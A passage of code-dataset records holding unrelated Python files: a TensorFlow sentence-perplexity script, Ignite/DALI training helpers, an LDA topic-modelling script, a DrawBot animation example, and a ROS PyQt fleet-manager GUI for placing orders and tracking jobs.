tower_mems_id_np[i]):\n feed_dict[id] = id_np\n \n sess.run(iterator.initializer, feed_dict={test_list: \\\n [[input_batch[i][token-1]] for i in range(per_core_bsz)]})\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n #print(feed_dict)\n\n tower_mems_np, output = fetched[:2]\n\n tower_mems_id_np = fetched[2]\n\n for txt_id in range(per_core_bsz):\n tmp_list = output[0][-1][txt_id]\n tmp_list = tmp_list.tolist()\n e_sum = sum([math.exp(i) for i in tmp_list])\n log_prob_list = [math.log(math.exp(i)) - math.log(e_sum) for i in tmp_list]\n\n log_probs[txt_id].append(log_prob_list[input_batch[txt_id][token]])\n\n for txt_id in range(per_core_bsz):\n sent_ppl_list[txt_id].append(_cal_ppl(log_probs[txt_id], input_lens[txt_id]))\n \n sent_ppl_list_merge = []\n for i in range(per_core_bsz):\n sent_ppl_list_merge.extend(sent_ppl_list[i])\n\n return sent_ppl_list_merge\n \n\ndef single_core_graph_for_inference(n_token, cutoffs, is_training, inp, mems, mems_id):\n model_fn = get_model_fn_for_inference(\n n_token=n_token,\n cutoffs=cutoffs)\n\n model_ret = model_fn(\n inp=inp,\n mems=mems,\n mems_id=mems_id,\n is_training=is_training)\n\n return model_ret\n\n\ndef get_model_fn_for_inference(n_token, cutoffs):\n def model_fn(inp, mems, mems_id, is_training):\n inp = tf.transpose(inp, [1, 0])\n\n if FLAGS.init == \"uniform\":\n initializer = tf.initializers.random_uniform(\n minval=-FLAGS.init_range,\n maxval=FLAGS.init_range,\n seed=None)\n elif FLAGS.init == \"normal\":\n initializer = tf.initializers.random_normal(\n stddev=FLAGS.init_std,\n seed=None)\n proj_initializer = tf.initializers.random_normal(\n stddev=FLAGS.proj_init_std,\n seed=None)\n\n tie_projs = [False for _ in range(len(cutoffs) + 1)]\n if FLAGS.proj_share_all_but_first:\n for i in range(1, len(tie_projs)):\n tie_projs[i] = True\n new_mems, output, new_mems_id, attn_prob = model.transformer_inference(\n dec_inp=inp,\n mems=mems,\n mems_id=mems_id,\n n_token=n_token,\n n_layer=FLAGS.n_layer,\n d_model=FLAGS.d_model,\n d_embed=FLAGS.d_embed,\n n_head=FLAGS.n_head,\n d_head=FLAGS.d_head,\n d_inner=FLAGS.d_inner,\n dropout=FLAGS.dropout,\n dropatt=FLAGS.dropatt,\n initializer=initializer,\n proj_initializer=proj_initializer,\n is_training=is_training,\n mem_len=FLAGS.mem_len,\n cutoffs=cutoffs,\n div_val=FLAGS.div_val,\n tie_projs=tie_projs,\n input_perms=None,\n target_perms=None,\n head_target=None,\n same_length=FLAGS.same_length,\n clamp_len=FLAGS.clamp_len,\n use_tpu=False,\n untie_r=FLAGS.untie_r,\n proj_same_dim=FLAGS.proj_same_dim)\n\n # number of parameters\n num_params = sum([np.prod(v.shape) for v in tf.trainable_variables()])\n tf.logging.info('#params: {}'.format(num_params))\n\n return new_mems, output, new_mems_id, attn_prob\n\n return model_fn\n\ndef cut_pad(num_list, r_len, pad_value=0):\n if len(num_list) == r_len:\n return num_list\n elif len(num_list) > r_len:\n return num_list[:r_len]\n else:\n return num_list + [pad_value]*(r_len-len(num_list))\n\n\ndef main(unused_argv):\n del unused_argv # Unused\n\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # Get corpus info\n corpus_info = data_utils.get_corpus_info(FLAGS.corpus_info_path)\n n_token = corpus_info[\"vocab_size\"]\n cutoffs = corpus_info[\"cutoffs\"][1:-1]\n tf.logging.info(\"n_token {}\".format(n_token))\n\n tmp_Vocab = Vocab(special=[\"\", \"\", \"\"])\n tmp_Vocab.count_file(\"../data/{}/train.txt\".format(FLAGS.dataset), add_eos=False)\n tmp_Vocab.build_vocab()\n\n if FLAGS.do_sent_ppl_pred:\n encoded_txt_input = []\n txt_input = []\n input_csv = []\n with open(FLAGS.input_file_dir, \"r\") as read_file:\n csv_reader = csv.reader(read_file)\n for line in csv_reader:\n if line[0].strip() != 0:\n input_csv.append(line)\n \n for i in range(1, len(input_csv)):\n txt_input.append(input_csv[i][0].strip())\n encoded_txt_input.append(list(tmp_Vocab.encode_sents(input_csv[i][0].strip(), \\\n add_eos=True, ordered=True)))\n\n #txt_input = txt_input[:7]\n #encoded_txt_input = encoded_txt_input[:7]\n\n encoded_txt_input_len = [len(encoded_txt) if len(encoded_txt) <= FLAGS.limit_len else FLAGS.limit_len \\\n for encoded_txt in encoded_txt_input]\n\n encoded_txt_input = [cut_pad(line, FLAGS.limit_len, 0) for line in encoded_txt_input]\n \n if len(encoded_txt_input) % FLAGS.pred_batch_size != 0:\n pad_len = FLAGS.pred_batch_size - (len(encoded_txt_input)%FLAGS.pred_batch_size)\n encoded_txt_input = encoded_txt_input + \\\n [[0]*FLAGS.limit_len]*pad_len\n encoded_txt_input_len = encoded_txt_input_len + \\\n [FLAGS.limit_len]*pad_len\n\n encoded_txt_input = np.array(encoded_txt_input).reshape(FLAGS.pred_batch_size,-1,FLAGS.limit_len)\n encoded_txt_input_len = np.array(encoded_txt_input_len).reshape(FLAGS.pred_batch_size,-1)\n input_csv[0].append(\"ppl\")\n \n if FLAGS.multiprocess == 1 or encoded_txt_input.shape[1]//FLAGS.multiprocess == 0:\n ppl_list = sent_ppl((encoded_txt_input, encoded_txt_input_len), n_token, cutoffs, \"/gpu:1\")\n \n for i in range(1, len(input_csv)):\n input_csv[i].append(ppl_list[i-1])\n output_df = pd.DataFrame(input_csv[1:], columns=input_csv[0])\n output_df.to_csv(FLAGS.output_file_dir, sep=\",\", index=False, encoding=\"utf-8-sig\")\n \n with open(\"sent_ppl_pred.txt\", \"w\") as write_res:\n for i in range(len(txt_input)):\n write_res.write(txt_input[i]+\"\\t\"+str(ppl_list[i])+\"\\n\")\n \n # Check whether the length of result is right; Make sure batch-predict work well\n print(len(ppl_list))\n else:\n pool = multiprocessing.Pool(FLAGS.multiprocess)\n parti_batch_num = encoded_txt_input.shape[1]//FLAGS.multiprocess\n pro_res_l = []\n\n for i in range(FLAGS.multiprocess):\n print(\"Setting process-%s\" % i)\n ### 有空这里要写一个控制使用gpu:xx的步骤(gpu:1满了就用下一个)\n\n if i+1 == FLAGS.multiprocess:\n end = encoded_txt_input.shape[1]\n else:\n end = (i+1)*parti_batch_num\n pro_res_l.append(pool.apply_async(sent_ppl, \\\n args=((encoded_txt_input[:,i*parti_batch_num:end,:], \\\n encoded_txt_input_len[:,i*parti_batch_num:end]), \\\n n_token, cutoffs, \"/gpu:1\")))\n \n res_l = [[] for _ in range(FLAGS.pred_batch_size)]\n\n for i in range(len(pro_res_l)):\n proc_i_res = pro_res_l[i].get()\n parti_len = len(proc_i_res)//FLAGS.pred_batch_size\n for j in range(FLAGS.pred_batch_size):\n res_l[j].extend(proc_i_res[j*parti_len:(j+1)*parti_len])\n\n pool.close()\n pool.join()\n print('All subprocesses done.')\n\n res_merge = []\n for i in range(FLAGS.pred_batch_size):\n res_merge.extend(res_l[i])\n tf.logging.info('#time: {}'.format(time.time()))\n \n for i in range(1, len(input_csv)):\n input_csv[i].append(res_merge[i-1])\n output_df = pd.DataFrame(input_csv[1:], columns=input_csv[0])\n output_df.to_csv(FLAGS.output_file_dir, sep=\",\", index=False, encoding=\"utf-8-sig\")\n\n with open(\"sent_ppl_pred.txt\", \"w\") as write_res:\n for i in range(len(txt_input)):\n write_res.write(txt_input[i] + \"\\t\" + str(res_merge[i]) + \"\\n\")\n \n # Check whether the length of result is right; Make sure multiprocess work well\n print(len(res_merge))\n \n \nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"tf/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":20453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"204036589","text":"# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\nfrom ignite.engine import Engine, _prepare_batch\nfrom ignite.engine import Events\nfrom ignite.contrib.handlers import ProgressBar\nfrom ignite.metrics import Accuracy, Loss, RunningAverage\n\n\ndef create_custom_supervised_trainer(model, optimizer, loss_fn, metrics={}, device=None, prepare_batch=None):\n \"\"\"\n We need to make some changes to the default trainer so we can use running metrics and consume Tensors from DALI\n \"\"\"\n\n def _update(engine, batch):\n model.train()\n optimizer.zero_grad()\n if not prepare_batch:\n x, y = _prepare_batch(batch, device=device)\n else:\n x, y = prepare_batch(batch, device=device)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n optimizer.step()\n return loss.item(), y_pred, y\n\n def _metrics_transform(output):\n return output[1], output[2]\n\n engine = Engine(_update)\n\n for name, metric in metrics.items():\n metric._output_transform = _metrics_transform\n metric.attach(engine, name)\n\n return engine\n\n\ndef make_keras_like(trainer, evaluator, validation_loader):\n \"\"\"\n \"I can't believe it's not Keras\"\n Running average accuracy and loss metrics + TQDM progressbar\n \"\"\"\n training_history = {'accuracy': [], 'loss': []}\n validation_history = {'accuracy': [], 'loss': []}\n last_epoch = []\n\n RunningAverage(output_transform=lambda x: x[0]).attach(trainer, 'loss')\n RunningAverage(Accuracy(output_transform=lambda x: (x[1], x[2]))).attach(trainer, 'accuracy')\n\n prog_bar = ProgressBar()\n prog_bar.attach(trainer, ['loss', 'accuracy'])\n\n prog_bar_vd = ProgressBar()\n prog_bar_vd.attach(evaluator)\n from ignite.handlers import Timer\n\n timer = Timer(average=True)\n timer.attach(trainer, start=Events.EPOCH_STARTED,\n resume=Events.EPOCH_STARTED,\n pause=Events.EPOCH_COMPLETED,\n step=Events.EPOCH_COMPLETED)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(trainer):\n metrics = trainer.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n last_epoch.append(0)\n training_history['accuracy'].append(accuracy)\n training_history['loss'].append(loss)\n train_msg = \"Train Epoch {}: acc: {:.2f}% loss: \".format(trainer.state.epoch, accuracy) + \\\n \"{:.2f}, train time: {:.2f}s\".format(loss, timer.value())\n\n evaluator.run(validation_loader)\n metrics = evaluator.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n validation_history['accuracy'].append(accuracy)\n validation_history['loss'].append(loss)\n val_msg = \"Valid Epoch {}: acc: {:.2f}% loss: {:.2f}\".format(trainer.state.epoch, accuracy, loss)\n\n prog_bar_vd.log_message(train_msg + \" --- \" + val_msg)\n","sub_path":"examples/contrib/DALI/dali_example_utilities.py","file_name":"dali_example_utilities.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"12176790","text":"import numpy as np\nimport pickle\nfrom gensim import corpora, models\n\n\n\n# load the coco activations obtained from running AlexNet on COCO\nyfcc100m_activations = np.load('data/yfcc100m_output_100k_crop.npy')\n\n# load 90th percentile thresholds obatined from running AlexNet on ImageNet\nimagenet_percentile_threshold = np.load('data/percentiles_imagenet.npy')\n\n# load tht list of images\nimg_list = np.load('data/image_list_yfcc100m_output_100k_crop.npy')\n\n# get features in each image in COCO which activate (have values which go above 90-percentileImageNet threshold)\nactivated_features_all_images_yfcc100m = (yfcc100m_activations >= imagenet_percentile_threshold)*1\nnp.save('data/one_hot_yfcc100m',activated_features_all_images_yfcc100m)\n\n# Load data\nX = np.load('data/one_hot_yfcc100m.npy')\n\n# Get data statistics, as a sanity check\nprint(\"Data shape: \", X.shape)\nprint(\"Number of 0s: \", np.sum(X == 1))\nprint(\"Number of 1s: \", np.sum(X == 0))\nprint(\"Anomailes: \",np.sum([X < 0]))\n\n# Define parameters for topic modelling\nnum_topics = [20, 50, 100]\nnum_words = 4096 # Number of top features to be displayed per topic\nnum_images = X.shape[0]\n\n# Prepare for corpus\ncorpus = [[(j, X[i, j]) for j in range(num_words) if X[i, j]==1] for i in range(num_images)]\ncorpora.MmCorpus.serialize('data/corpus.mm', corpus)\n\n# Load corpus\ncorpus = corpora.MmCorpus('data/corpus.mm')\n\nfor K in num_topics:\n # Create the Topic Model\n model_name = str(K) + '-topics.model'\n lda = models.ldamodel.LdaModel(corpus, num_topics = K)\n lda.save('data/' + model_name)\n\n # Get topic for each image\n img_by_topic = [[] for _ in range(K)]\n for i in range(num_images):\n ind, val = sorted(lda.get_document_topics(corpus[i]), key=lambda x:x[1])[-1]\n img_by_topic[ind].append((i, val))\n\n for j in range(K):\n img_by_topic[j].sort(key = lambda x: -x[1])\n\n # Save results\n with open(\"data/\" + str(K) + \"-topic-res.txt\", \"wb\") as fp:\n pickle.dump(img_by_topic, fp)\n\n# Load results\nwith open(\"data/2-topic-res.txt\", \"rb\") as fp:\n img_by_topic = pickle.load(fp)\n","sub_path":"topic_models.py","file_name":"topic_models.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"312764897","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens & Font Bureau\n# www.pagebot.io\n#\n# P A G E B O T\n#\n# Licensed under MIT conditions\n#\n# Supporting usage of DrawBot, www.drawbot.com\n# Supporting usage of Flat, https://github.com/xxyxyz/flat\n# -----------------------------------------------------------------------------\n#\n# Horizon.py\n#\nfrom random import choice\nfrom pagebot.builders import drawBotBuilder as b\nif b is None:\n print ('Example runs only in DrawBot')\nelse:\n LETTERS = 'ABCEFGHIJKLMNOPQTSTIVWXUZ'\n\n Frames = 100\n\n W = H = 500\n IMAGE_PATH = '_export/HorizonWorld.gif'\n if not 'BitcountMonoDouble-RegularCircle' in b.installedFonts():\n fontNames = ['Georgia-Bold', 'Georgia']\n else:\n fontNames = []\n for fontName in installedFonts():\n if 'BitcountMono' in fontName and not 'Italic' in fontName:\n fontNames.append(fontName)\n \n letters = []\n for n in range(10):\n c = choice(LETTERS)\n x = 0 \n y = 15 \n z = 20+int(random()*500)\n\n x = 1/z + random()*100-100\n cc = random()*0.8+0.1, random()*0.1, random()*0.8*0.1\n f = choice(fontNames)\n letters.append((c, f, x, y, z, cc))\n \n for n in range(Frames):\n b.newPage(W, H)\n b.fill(0.8)\n b.rect(0, 0, W, H)\n for c, f, x, y, z, (r, g, b) in letters:\n #y = y/z\n b.fill(r, g, b)\n b.font(f)\n b.stroke(None)\n fSize = min(200, 40000/z)\n b.fontSize(fSize)\n b.text(c, (x+250, y+250-fSize/2))\n\n b.fill(None)\n b.strokeWidth(0.5)\n b.stroke(0.5)\n b.line((0, 250), (500, 250))\n \n b.fill(1, 1, 1, 0.4)\n b.rect(0, 0, W, H/2-1)\n \n for n in range(0, 500, 10):\n b.fill(None)\n b.stroke(1)\n y = W/2-2 - n*0.4\n lineThickness = (random()*3+0.5) * (H/2 - y)/10\n b.strokeWidth(lineThickness)\n b.line((0, y-lineThickness/2), (W, y-lineThickness/2))\n \n b.saveImage(IMAGE_PATH)\n\n","sub_path":"Examples/Compositions/Horizon.py","file_name":"Horizon.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"100812546","text":"#! /usr/bin/env python\nimport json # Used for reading JSON files (loading jobs to JobQueue)\nimport os # Used to get base filename and file and directory handling\nimport sys\n\nimport rospy\nfrom PyQt4 import QtGui, QtCore\n\nfrom rooster_fleet_manager.srv import PlaceOrder, PlaceOrderRequest, GetPendingJobs, GetPendingJobsRequest, GetActiveJobs, GetActiveJobsRequest\nfrom rooster_fleet_manager.msg import MexListInfo\nfrom ui import fleet_manager_ui\nfrom JobManager.Order import *\nfrom JobManager.Job import JobStatus, Job, JobPriority\n\n#region ################################### TO DO LIST #####################################\n# DONE 1. Perform simple call /job_manager/place_order service.\n# DONE 2. Load list of orders from JSON.\n# DONE 3. Call /job_manager/place_order(s?) service with the list of orders.\n# DONE 4. Add visually correct but non-functional GUI to node.\n# DONE 5. Replace JSON order list call and instead visualize it in the Order tab.\n# DONE 6. Connect MEx Sentinel to Mobile Executors treeWidget view.\n# DONE 7. Check if the order is viable before adding to order list, notify user if not.\n# DONE 8. Remove orders from Order list if they were placed succesfully.\n# DONE 9. Put in Placeholder text in the arguments field based on the order keyword.\n# DONE 10. Connect Job Manager to the Jobs treeWidget view.\n# DONE 11. Add the deletion of individual orders from the order list.\n# DONE 12. Replace placeholders in the FILE ACTION MENU.\n# DONE 13. Add logo in same style as GUI launcher.\n# DONE 14. Automatically sort the Jobs list when new jobs have been added.\n# DONE 15. Add KEYWORD to Job. \n# DONE 16. Fix issue where Job list does not update when <= 1 Jobs after Job completions.\n#endregion #################################################################################\n\n\nVERSION = \"1.0\"\nAPPLICATION_TITLE = \"Fleet Manager\"\nNODE_NAME = \"[fleet_manager_front] \"\nprint(NODE_NAME + APPLICATION_TITLE + \". Version: \"+VERSION)\n\n\n#region ### PyQt GUI ###\nclass GuiMainWindow(fleet_manager_ui.Ui_MainWindow, QtGui.QMainWindow):\n def __init__(self):\n \"\"\"\n Initialise the ui widgets, items and varibles.\n Connect up all UI interactions to their methods.\n \"\"\"\n super(GuiMainWindow, self).__init__()\n self.setWindowTitle(APPLICATION_TITLE) #self.filename + \" - \" + \n\n # Set up gui\n self.setupUi(self)\n\n #region FILE ACTION MENU\n self.actionAbout.triggered.connect(self.about)\n self.actionQuit_application.triggered.connect(self.close_application)\n #endregion\n\n #region ORDERS TAB\n self.pushButtonAddOrder.clicked.connect(self.add_order)\n self.pushButtonClearList.clicked.connect(self.clear_order_list)\n self.pushButtonPlaceOrder.clicked.connect(self.place_order_list)\n self.comboBoxKeyword.currentIndexChanged.connect(self.update_order_arguments_placeholder_text)\n self.lineEditArguments.setPlaceholderText(\"location\")\n\n # TreeWidget context menu\n self.treeWidgetOrders.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.treeWidgetOrders.customContextMenuRequested.connect(self.open_context_menu) \n\n self.treeMenu = QtGui.QMenu('Menu', self)\n deleteItem = QtGui.QAction(\"&Delete\", self)\n deleteItem.setStatusTip(\"Delete item from Order list\")\n deleteItem.triggered.connect(self.delete_orders_tree_item)\n deleteIcon = QtGui.QIcon()\n deleteIcon.addPixmap(QtGui.QPixmap(\":/icons/Close.png\"))\n deleteItem.setIcon(deleteIcon)\n self.treeMenu.addAction(deleteItem)\n\n #endregion\n\n def open_context_menu(self):\n \"\"\" Opens the Right-Mouse-Button context menu, showing an option to delete the order tree item. \"\"\"\n self.treeMenu.exec_(QtGui.QCursor.pos())\n\n def delete_orders_tree_item(self, item):\n \"\"\" Deletes the currently selected item from the orders treeWidget. \"\"\"\n index = self.treeWidgetOrders.currentIndex()\n self.treeWidgetOrders.takeTopLevelItem(index.row())\n\n def update_order_arguments_placeholder_text(self):\n \"\"\"\n Updates the light gray placeholder text of the Order arguments lineEdit\n input field to match with the new keyword.\n \"\"\"\n keyword = str(self.comboBoxKeyword.currentText())\n if keyword == OrderKeyword.LOAD.name or keyword == OrderKeyword.UNLOAD.name:\n self.lineEditArguments.setPlaceholderText(\"No Arguments!\")\n elif keyword == OrderKeyword.MOVE.name:\n self.lineEditArguments.setPlaceholderText(\"location\")\n elif keyword == OrderKeyword.TRANSPORT.name:\n self.lineEditArguments.setPlaceholderText(\"location1 location2\")\n \n def place_order_list(self):\n \"\"\" Place multiple orders from the Order tab Order list to the Job Manager. \"\"\"\n # The order of the orders matter, so don't just loop over the dictionary, but check size and loop over order id's\n self.order_list = [] # Empty order list\n indices_to_remove = [] # Empty list for treeWidgetOrders indices.\n\n # Iterate over all the existing (top level) items (a.k.a. orders) in the treeWidgetOrders and add as order.\n root = self.treeWidgetOrders.invisibleRootItem()\n child_count = root.childCount()\n for i in range(child_count):\n item = root.child(i)\n order_keyword = str(item.text(0))\n order_priority = str(item.text(1))\n order_arguments = str(item.text(2)).split()\n order = [order_keyword, order_priority, order_arguments, i]\n self.order_list.append(order)\n \n # If there are orders to be placed, call the job_manager's place_order service.\n if len(self.order_list) != 0:\n rospy.wait_for_service('/job_manager/place_order')\n try:\n place_order = rospy.ServiceProxy('/job_manager/place_order', PlaceOrder)\n req = PlaceOrderRequest()\n for order in self.order_list:\n req.keyword = order[0]\n req.priority = order[1]\n req.order_args = order[2]\n resp = place_order(req)\n print(NODE_NAME + \"Response: \", resp)\n if resp.error_status == OrderResponseStatus.SUCCES.name:\n # The placement of this order was succesful, remove from Order list\n indices_to_remove.append(order[3])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n \n if len(indices_to_remove) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_to_remove.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetOrders\n for index in indices_to_remove:\n self.treeWidgetOrders.takeTopLevelItem(index)\n \n if len(indices_to_remove) != len(self.order_list):\n # Show a notification box alerting the user not all orders were placed succesfully.\n QtGui.QMessageBox.warning(self, \"Not all orders could be placed succefully!\", \"Out of the \" + str(len(self.order_list)) + \" orders, \" + str(len(self.order_list) - len(indices_to_remove)) + \" could not be placed succesfully. These orders have been kept in the order list, succesful orders have been removed.\")\n else:\n # Show a notification informing the user that all orders were placed succesfully.\n QtGui.QMessageBox.information(self, \"All orders placed succesfully!\", \"All \" + str(len(self.order_list)) + \" order(s) have been placed succesfully and have been removed from the order list.\")\n\n\n def clear_order_list(self):\n \"\"\"Clears the Order tab order list.\"\"\"\n root = self.treeWidgetOrders.invisibleRootItem()\n child_count = root.childCount()\n if child_count > 0:\n self.treeWidgetOrders.clear()\n\n def add_order(self):\n \"\"\"\n Add a order to the Order List based on the Order tab input field values.\n Before adding, a check is performaned to make sure the supplied fields are set correctly.\n If this is not the case the user is notified with a MessageBox.\n \"\"\"\n order_keyword = self.comboBoxKeyword.currentText()\n order_priority = self.comboBoxPriority.currentText()\n order_arguments = self.lineEditArguments.text()\n \n # Check if the number of supplied arguments \n supplied_args = len(str(order_arguments).split())\n expected_args = OrderTypeArgCount[str(order_keyword)].value\n\n if supplied_args == expected_args:\n # Add the order to the order list.\n self.lineEditArguments.clear()\n order_item = QtGui.QTreeWidgetItem([order_keyword, order_priority, order_arguments])\n self.treeWidgetOrders.addTopLevelItem(order_item)\n else:\n # Show a notification informing the user that the order is incorrect.\n QtGui.QMessageBox.information(self, \"Incorrect number of order arguments!\", \"Incorrect number of arguments. Supplied \" + str(supplied_args) + \" argument(s) (\" + order_arguments + \"). Expected \" + str(expected_args) + \" argument(s).\")\n\n\n def close_application(self):\n \"\"\"Prompts the user if they are sure they which to quit the application before quitting.\"\"\"\n choice = QtGui.QMessageBox.question(self, \n 'Quit application?',\n \"Are you sure you want to quit? Any unsaved changed will be lost!\", \n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n \n if choice == QtGui.QMessageBox.Yes:\n print(NODE_NAME + \"Closing Fleet Manager node...\")\n QtCore.QCoreApplication.instance().quit()\n else:\n pass\n \n def closeEvent(self, event):\n \"\"\"Takes control of the close event, making sure the user cannot close the application before prompting them.\"\"\"\n event.ignore()\n self.close_application()\n \n def about(self):\n \"\"\"Display a MessageBox with the application title, version number and general information.\"\"\"\n text = \"
\" \\\n \"
\"+APPLICATION_TITLE+\"
\" \\\n \"
\" \\\n \"The ROS package rooster_fleet_manager is created by the Human \" \\\n \"Robot Co-production research group at the Industrial Design \" \\\n \"Engineering faculty of the Delft University of Technology.\" \\\n \"
Version: \"+VERSION+\" \" \\\n \"License: Apache License version 2.0
\"\n QtGui.QMessageBox.about(self, \"About - \" + APPLICATION_TITLE + \".\", text)\n\n#endregion ### PyQt GUI ###\n\n\n\n\n\ndef load_orders_from_JSON(filepath):\n \"\"\" Function; Add one or multiple orders from a JSON file. \"\"\"\n # Load JSON file into dictionary\n loaddata_dict = None\n with open(filepath) as json_loadfile:\n loaddata_dict = json.load(json_loadfile)\n \n # Add orders from loaded JSON dictionary to the Order tab Order list.\n for order_id in range(len(loaddata_dict)):\n order_info_dict = loaddata_dict[str(order_id)]\n item_keyword = order_info_dict[\"keyword\"]\n item_priority = order_info_dict[\"priority\"]\n item_order_args = order_info_dict[\"order_args\"]\n item_arguments = \"\"\n for arg in item_order_args:\n item_arguments = item_arguments + \" \" + arg\n order_item = QtGui.QTreeWidgetItem([item_keyword, item_priority, item_arguments])\n appGui.treeWidgetOrders.addTopLevelItem(order_item)\n\ndef job_list_cb(event):\n \"\"\"\n Timer callback function, attempts to call Job Manager 'get_pending_jobs' & \n 'get_active_jobs' services for updating the Jobs treeWidget list.\n \"\"\"\n combined_jobs_list = [] # Empty list for the jobs to be appened to.\n\n # Retrieve pending jobs.\n try:\n rospy.wait_for_service('/job_manager/get_pending_jobs', rospy.Duration(1))\n try:\n get_pending_jobs = rospy.ServiceProxy('/job_manager/get_pending_jobs', GetPendingJobs)\n req = GetPendingJobsRequest()\n resp = get_pending_jobs(req)\n if resp.jobs_count > 0:\n # Add jobs to combined_jobs_list\n for job in resp.jobs:\n # [0 ID, 1 Priority, 2 Keyword, 3 Status, 4 MEx ID, 5 Task Count, 6 Current Task, 7 processed]\n combined_jobs_list.append([job.job_id, job.priority, job.keyword, JobStatus.PENDING.name, None, job.task_count, 0, False])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n except rospy.ROSException:\n pass\n\n # Retrieve active jobs.\n try:\n rospy.wait_for_service('/job_manager/get_active_jobs', rospy.Duration(1))\n try:\n get_active_jobs = rospy.ServiceProxy('/job_manager/get_active_jobs', GetActiveJobs)\n req = GetActiveJobsRequest()\n resp = get_active_jobs(req)\n if resp.jobs_count > 0:\n # Add jobs to combined_jobs_list\n for job in resp.jobs:\n # [0 ID, 1 Priority, 2 Keyword, 3 Status, 4 MEx ID, 5 Task Count, 6 Current Task, 7 processed]\n combined_jobs_list.append([job.job_id, job.priority, job.keyword, job.status, job.mex_id, job.task_count, job.current_task+1, False])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n except rospy.ROSException:\n pass\n\n # if len(combined_jobs_list) > 0:\n update_jobs_list(combined_jobs_list)\n\ndef update_jobs_list(combined_jobs_list):\n \"\"\"\n Add new/update existing items in the Jobs treeWidget with response information:\n 1. Take in pending jobs and active jobs info into a single list.\n 2. Loop over exisiting Job items in the treeWidget.\n 3. If the job is in the list, update information.\n 4. If it's not in the list, mark index for removal.\n 5. If not all list items have been processed, this means it's new. Add new job items to the treeWidget.\n 6. Loop over indices_for_removal list in descending order and remove all job items no longer existing.\n \"\"\"\n # [2, 3, 4] First check if current Job items in the treeWidget require updating or removing.\n root = appGui.treeWidgetJobs.invisibleRootItem()\n child_count = root.childCount()\n indices_for_removal = [] # Empty list to which indices can be appended which can be removed after updating others.\n for i in range(child_count): # Iterate over all the existing (top level) items (a.k.a. jobs) in the treeWidgetJobs.\n item = root.child(i)\n job_id = str(item.text(0))\n\n # Loop over all job information lists in the the combined_jobs_list, checking if the 'job_id' is in there.\n for job_info_list in combined_jobs_list:\n if job_id in job_info_list:\n # It's in there, so update the information and mark processed as True.\n item.setText(0, job_info_list[0])\n item.setText(1, str(JobPriority[str(job_info_list[1])].value)+\" / \"+job_info_list[1])\n item.setText(2, job_info_list[2])\n item.setText(3, job_info_list[3])\n item.setText(4, \"\\xA0\" if job_info_list[4] == None else \"\"+str(job_info_list[4]) )\n item.setText(5, str(job_info_list[6])+\" / \"+str(job_info_list[5]) )\n job_info_list[7] = True\n break\n else:\n # The job item with it's job id is no longer in the Job Managers jobs lists, thus mark for removal.\n indices_for_removal.append(i)\n \n # [5] Check for unprocessed list items, adding them as new items to the jobs treeWidget\n for job_info_list in combined_jobs_list:\n if job_info_list[7] == False:\n job_item = QtGui.QTreeWidgetItem( [ \n str(job_info_list[0]), \n str(JobPriority[str(job_info_list[1])].value)+\" / \"+job_info_list[1], \n str(job_info_list[2]), \n str(job_info_list[3]), \n \"\\xA0\" if job_info_list[4] == None else \"\"+str(job_info_list[4]), \n str(job_info_list[6])+\"/\"+str(job_info_list[5]) ] )\n appGui.treeWidgetJobs.addTopLevelItem(job_item)\n\n # [6] Remove items which were marked for removal\n if len(indices_for_removal) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_for_removal.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetJobs\n for index in indices_for_removal:\n appGui.treeWidgetJobs.takeTopLevelItem(index)\n \n \ndef mex_list_info_cb(data):\n \"\"\"\n Subscription callback for the MEx Sentinel mex_list_info topic. \n 1. Take in MEx info.\n 2. Loop over exisiting MEx items in the treeWidget.\n 3. If the MEx is in the list, update information.\n 4. If it's not in the list, mark index for removal.\n 5. If not all list items have been processed, this means it's new. Add new MEx items to the treeWidget.\n 6. Loop over indices_for_removal list in descending order and remove all MEx items no longer existing.\n \"\"\"\n if data.total_mex_number > 0:\n # [1] Take in MEx info, add all MExs in list to a temporary dictionary.\n temp_dict = {} # Empty dictionary in which items will be marked as processed (True) or not (False).\n for mex_info in data.mex_list_info_array:\n temp_dict[str(mex_info.id)] = {\n \"id\" : mex_info.id,\n \"job_id\" : mex_info.job_id,\n \"status\" : mex_info.status,\n \"processed\" : False\n } # Add incoming MEx info to temp_dict as dict and mark as not yet processed.\n\n # [2, 3, 4] First check if current MEx items in the treeWidget require updating or removing.\n root = appGui.treeWidgetMEx.invisibleRootItem()\n child_count = root.childCount()\n indices_for_removal = [] # Empty list to which indices can be appended which can be removed after updating others.\n\n for i in range(child_count): # Iterate over all the existing (top level) items (a.k.a. MExs) in the treeWidgetMEx.\n item = root.child(i)\n mex_id = str(item.text(0))\n\n # Loop over all MEx information lists in the the mex_list_info_array, checking if the 'mex_id' is in there.\n for mex_info in data.mex_list_info_array:\n if mex_id == mex_info.id:\n # It's in there, so update the information and mark processed as True.\n item.setText(0, str(mex_info.id) )\n item.setText(1, str(mex_info.status) )\n 